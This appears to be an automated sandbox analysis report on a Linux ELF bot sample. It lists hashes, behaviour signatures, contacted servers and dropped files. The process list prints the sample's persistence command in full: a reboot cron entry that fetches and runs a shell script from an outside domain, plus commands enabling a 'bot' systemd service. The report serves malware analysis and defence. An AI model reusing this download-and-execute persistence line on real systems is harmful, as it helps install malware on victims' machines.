Analysis Overview
SHA256
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
Threat Level: Shows suspicious behavior
The file 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Unexpected DNS network traffic destination
Renames itself
Modifies systemd
Creates/modifies Cron job
Changes its process name
Command and Scripting Interpreter: Unix Shell
Enumerates kernel/hardware configuration
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-05 02:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 02:39
Reported
2024-11-05 02:42
Platform
debian9-armhf-20240611-en
Max time kernel
144s
Max time network
183s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 194.36.144.87 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.SlgGcx | /usr/bin/crontab | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /lib/systemd/system/bot.service | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Command and Scripting Interpreter: Unix Shell
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/fs/kdbus/0-system/bus | /bin/systemctl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/self/stat | /bin/systemctl | N/A |
| File opened for reading | /proc/1/environ | /bin/systemctl | N/A |
| File opened for reading | /proc/cmdline | /bin/systemctl | N/A |
| File opened for reading | /proc/mounts | /tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf | N/A |
Processes
/tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf
[/tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf]
/bin/sh
[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
/bin/sh
[/bin/sh -c /sbin/initctl start bot]
/sbin/initctl
[/sbin/initctl start bot]
/bin/sh
[/bin/sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:8036 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.SlgGcx
| MD5 | 1d0bf56bdb32d8a884196a2a712007ec |
| SHA1 | a201a1cfcc93806302241e8adeddcc80187ff68c |
| SHA256 | ed1b0a18ecd01c30cde93753a50554218fd91f32428ee795a0c06c91259c24d3 |
| SHA512 | 66d4d60fc1d7d24b99172591580e0c89ee874937c1d04072813f272498fc685cd8d6e05dc59264afa255499311d4216a76a8fb1adb73229178037fc51c2eeeed |
/etc/init/bot.conf
| MD5 | 9722585f219a220a4dc2a0c49bd3b019 |
| SHA1 | ffba476658ea681147c570c6f2b16a79e7d38e19 |
| SHA256 | bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d |
| SHA512 | 77f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4 |
/lib/systemd/system/bot.service
| MD5 | a4e30f6ce6fb6cf00e133f3c93fb5449 |
| SHA1 | 67b7de93a672ada4abfe11e339dc2e270c61b69d |
| SHA256 | a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede |
| SHA512 | 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25 |